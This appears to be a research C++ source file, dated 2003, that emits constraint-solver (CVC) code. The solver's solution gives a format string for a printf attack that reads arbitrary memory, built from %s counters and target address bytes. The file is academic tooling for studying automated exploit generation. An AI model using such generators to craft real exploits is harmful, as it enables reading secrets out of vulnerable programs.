/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
/* CVC Code Generation for Automatic Generation of Attack Format Strings     */
/*                                                                           */
/* Vinod Ganapathy                                       6 November 2003     */
/*                                                                           */
/* Functionality: Given the set of attack parameters, automatically generate */
/* CVC code for the format string attack.                                    */
/*                                                                           */
/* The code in this file is specifically targeted at printf, and the attack  */
/* that reads from an arbitrary location in memory.                          */
/*                                                                           */
/* The boolean formula whose satisfying inst. gives us a format string that  */
/* can be used for the attack is:                                            */
/*          Ax: format[x] \in {alphabet}       ^                             */
/*          (fmt0 = arg0 + distance)           ^                             */
/*          (fmt0 = 0)                         ^                             */
/*          (arg1 >= arg0 + distance)          ^                             */
/*          (arg1 <= arg0 + distance + fmt_length) ^                         */
/*          arg1 is an integer                 ^                             */
/*          (fmt1 > fmt0 + 1)                  ^                             */
/*          (fmt1 < fmt0 + fmt_length - 1)     ^                             */
/*          fmt1 is an integer                 ^                             */
/*          format[arg1] = adr0                ^                             */
/*          format[arg1+1] = adr0 + 1          ^                             */
/*          format[arg1+2] = adr0 + 2          ^                             */
/*          format[arg1+3] = adr0 + 3          ^                             */
/*          # %s and %x between fmt0 and fmt1 is (arg1 - arg0)/4             */
/*                                                                           */
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

#include "printf_read_attack.h"

//-----------------------------------------------------------------------------
// Declarations.
//-----------------------------------------------------------------------------
void printf_read_attack::declarations (void) {
  // The set of format characters for which counters have to be defined.
  std::set<std::string>::iterator fc_set_it;
  
  fc_set.insert("s");
//  fc_set.insert("x");

  std::cout << "%----------------------------------------------------------\n";
  std::cout << "% Declarations\n";  
  std::cout << "%----------------------------------------------------------\n";

  std::cout << "arg0, arg1, fmt0, fmt1               : REAL;\n";
  std::cout << "distance, fmt_length                 : REAL;\n";
  std::cout << "adr_lo, adr_medlo, adr_medhi, adr_hi : REAL;\n";
  std::cout << "format                               : ARRAY REAL OF REAL;\n";
  std::cout << "percent                              : REAL;\n";
  
  for (fc_set_it = fc_set.begin(); fc_set_it != fc_set.end(); fc_set_it++) {
    std::cout << *fc_set_it << " : REAL;\n";
    std::cout << *fc_set_it << "_count   :   [REAL->REAL];\n";  
  }
  
  std::cout << "\n";
  return;
}

//-----------------------------------------------------------------------------
// Initialization code. To set the values of %, s, x, etc. Also initialize the
// attack parameters.
//-----------------------------------------------------------------------------
void printf_read_attack::initialization (void) {
  // The ASCII values for each of the format characters we used!
  // For instance, we were interested in %s, and so we must declare
  std::set<std::string>::iterator fc_set_it;
  int ascii;

  std::cout << "%----------------------------------------------------------\n";
  std::cout << "% The code to give concrete values to the attack parameters\n";
  std::cout << "%----------------------------------------------------------\n";
  
  std::cout << "ASSERT distance = " << distance << ";\n\n";
  
  std::cout << "ASSERT fmt_length = " << fmt_length << ";\n\n";
  
  std::cout << "ASSERT adr_lo = "    << address_lsb << ";\n\n";
  
  std::cout << "ASSERT adr_medlo = " << address_med_lsb << ";\n\n";
  
  std::cout << "ASSERT adr_medhi = " << address_med_msb << ";\n\n";
  
  std::cout << "ASSERT adr_hi = "    << address_msb << ";\n\n";
  
  std::cout << "%----------------------------------------------------------\n";
  std::cout << "% The code to assign values to the symbols used\n";  
  std::cout << "%----------------------------------------------------------\n";
  
  // The ASCII for '%' is 37, need to put separately since % is comment in CVC.
  std::cout << "ASSERT percent = 37;\n";
  
  for (fc_set_it = fc_set.begin(); fc_set_it != fc_set.end(); fc_set_it++) {
    ascii = (*fc_set_it)[0];
    std::cout << "ASSERT " << *fc_set_it << " = " << ascii << ";\n";
  }
    
  std::cout << "\n\n";

  return;
}

//-----------------------------------------------------------------------------
// Attack Encoding. The actual set of boolean constraints that are crucial to
// encode this attack.
//-----------------------------------------------------------------------------
void printf_read_attack::attack_encoding (void) {
  std::set<std::string>::iterator fc_set_it;
  
  std::cout << "%----------------------------------------------------------\n";
  std::cout << "% The actual attack\n";
  std::cout << "%----------------------------------------------------------\n";

  // The following statement is required since we are saying something about
  // format string array only from location 0 onwards in all the other
  // definitions, for instance in the definition of the counters;
  std::cout << "ASSERT fmt0 = 0;\n\n";
  
  std::cout << "ASSERT arg0 = fmt0 - distance;\n\n";
  
  std::cout << "ASSERT arg1 >= fmt0;\n\n"; 

  std::cout << "ASSERT fmt1 < fmt0 + fmt_length - 1;\n\n";

  std::cout << "ASSERT fmt1 > fmt0 + 1;\n\n";

  std::cout << "ASSERT arg1 >= arg0 + distance;\n\n";

  std::cout << "ASSERT arg1 < arg0 + distance + fmt_length - 4;\n\n";

  std::cout << "ASSERT arg1 = arg0";
  
  for (fc_set_it = fc_set.begin(); fc_set_it != fc_set.end(); fc_set_it++) {
    std::cout << " + (4 * " << *fc_set_it << "_count( (fmt1 - 2) - fmt0 ) )";
  }
  std::cout << ";\n\n";
  
}

//-----------------------------------------------------------------------------
// Restrict the contents of the format string to a particular alphabet. 
// In this case, we restrict it to be between values 0-255.
//
// INPUT:  fmt_length
// OUTPUT: format[i] \in alphabet (ASCII in our case) for i \in [0..fmt_length-1]
//-----------------------------------------------------------------------------
void printf_read_attack::format_string_alphabet (void) {
  int i, j;
  std::set<std::string>::iterator fc_set_it;

  std::cout << "%----------------------------------------------------------\n";
  std::cout << "% Restricting the alphabet of the format string.\n";
  std::cout << "%----------------------------------------------------------\n";
 
/*
// Below is the naive way to restrict the alphabet, saying that the contents
// of each byte in the format string can be anywhere between 0 and 255. This
// leads to disastrous performance.
  for (i = 0; i < fmt_length; i++) {
    std::cout << "ASSERT\n";
    for (j = 0; j < 255; j++) {
      std::cout << "\t\t(format[" << i << "] = " << j << ") OR\n";
    }
    std::cout << "\t\t(format[" << i << "] = 255);\n\n";
  }
*/

// Optimization 1: (Will lead to spurious counterexamples). Make the contents
// anywhere between 0 and 255. That is, remove the integrality constraints, 
// and just add inequalities. This did not lead to performance improvements.

// Optimization 2: Just add constraints saying that the format string just
// contains the different alphabet symbols that are of concern to us. That
// is, it consists only of percent, s, x, etc, and the address that we need
// to read from. This again did not lead to any performance improvements.
  for (i = 0; i < fmt_length; i++) {
    // percent is in the alphabet.
		std::cout << "ASSERT (format[" << i << "] = percent) OR\n";
		// The different formatting characters are in the alphabet.
    for (fc_set_it = fc_set.begin(); fc_set_it != fc_set.end(); fc_set_it++) {
      std::cout << "\t(format[" << i << "] = " << *fc_set_it << ") OR\n";
    }
		// The address to be exploited is in the alphabet.
    std::cout << "\t(format[" << i << "] = " << address_lsb << ") OR\n"
              << "\t(format[" << i << "] = " << address_med_lsb << ") OR\n"
              << "\t(format[" << i << "] = " << address_med_msb << ") OR\n"
              << "\t(format[" << i << "] = " << address_msb << ") OR\n";
 		// The don't care value.
		std::cout << "\t(format[" << i << "] = 255);\n\n";
	}

  return;
}

//-----------------------------------------------------------------------------
// There are counters for each kind of formatting character, and this function
// is used to generate counter definitions on each of them (for the counter
// that is used in the boolean formula whose satisfyability we want to test)
//
// The counters count the number of formatting characters, for instance %x, %s
// etc. Consider the example of %x: suppose the % is at location 5. x_count(5)
// will include the number of %x's upto and including this %x. x_count(6) will
// trivially be equal to x_count(5) because location 6 has x on it.
// 
// INPUT: fmt_length
// OUTPUT: For each format string character, x, to be counted:
//         Definition of the counter for x_count. x_count(i) counts the number
//         of x's upto and including the i^th location
//-----------------------------------------------------------------------------
void printf_read_attack::counter_definition (void) {
  int i;
  //std::set<std::string> fc_set;
  std::set<std::string>::iterator fc_set_it;

  for (fc_set_it = fc_set.begin(); fc_set_it != fc_set.end(); fc_set_it++) {
    std::cout << "%---------------------------------------------------------\n";
    std::cout << "% The counter " << *fc_set_it << "_count is defined below \n";
    std::cout << "%---------------------------------------------------------\n";

    std::cout << "ASSERT IF ((format[0] = percent) AND (format[1] = " 
              << *fc_set_it << "))\n";
    std::cout << "  THEN (" << *fc_set_it << "_count(0) = 1)\n";
    std::cout << "  ELSE (" << *fc_set_it << "_count(0) = 0)\n";
    std::cout << "ENDIF;\n\n";

    for (i = 1; i < fmt_length; i++) {
      std::cout << "ASSERT IF ((format[" << i << "] = percent) AND "
                << "(format[" << (i + 1) << "] = " << *fc_set_it << "))\n";
      std::cout << "  THEN " << *fc_set_it << "_count(" << i << ") = "
                << *fc_set_it << "_count(" << i - 1 << ") + 1\n";
      std::cout << "  ELSE " << *fc_set_it << "_count(" << i << ") = "
                << *fc_set_it << "_count(" << i - 1 << ")\n";
      std::cout << "ENDIF;\n\n";
    }
    
  }

  return;
}

//-----------------------------------------------------------------------------
// Integrality Constraints.
// These are to ensure that the variables fmt1 and arg1 are integers.
// INPUT : fmt_length
// OUTPUT: fmt1 = fmt0 + i for each i \in [0..fmt_length-1]
//         arg1 = arg0 + i for each i \in [0..fmt_length-1-4]
//-----------------------------------------------------------------------------
void printf_read_attack::integrality_constraints (void) {
  int i;

  std::cout << "ASSERT\n"; 
  for (i = 0; i < fmt_length - 1; i++) {
    std::cout << "       (fmt1 = fmt0 + " << i << ") OR\n"; 
  }
  std::cout << "       (fmt1 = fmt0 + " << fmt_length - 1 << ");\n\n";
  
  if (fmt_length - 4 - 1 < 0) {
    std::cerr << "For meaningful results, the fmt_length has to be at least 5\n";
    exit(1);
  }

  std::cout << "ASSERT\n"; 
  for (i = 0; i < fmt_length - 4; i++) {
    std::cout << "       (arg1 = fmt0 + " << i << ") OR\n"; 
  }
  std::cout << "       (arg1 = fmt0 + " << fmt_length - 4 << ");\n\n";
  
  return;
}

//-----------------------------------------------------------------------------
// Query string.
// Also encodes particulars of the attack (that the fmt1 char is %s)
//-----------------------------------------------------------------------------
void printf_read_attack::query (void) {

  // The format string grows from smaller addresses to bigger addresses.
  // So format[0] is at a lower address than format[1]
  // Since little endian, have smaller address containing less significant
  // bits
  std::cout << "QUERY( (format[fmt1] = percent) AND\n";
  std::cout << "       (format[fmt1 + 1] = s) AND\n";
  std::cout << "       (format[arg1] = adr_lo) AND\n";
  std::cout << "       (format[arg1 + 1] = adr_medlo) AND\n";
  std::cout << "       (format[arg1 + 2] = adr_medhi) AND\n";
  std::cout << "       (format[arg1 + 3] = adr_hi) => FALSE);\n";

  std::cout << "\nWHERE;\n";
  return;
}

//-----------------------------------------------------------------------------
// Generate CVC code for the attack.
//-----------------------------------------------------------------------------
void printf_read_attack::generate_cvc_code (void) {

  declarations();
  initialization();
  attack_encoding();
  format_string_alphabet();
  counter_definition();
  integrality_constraints();
  query();

  return;
}
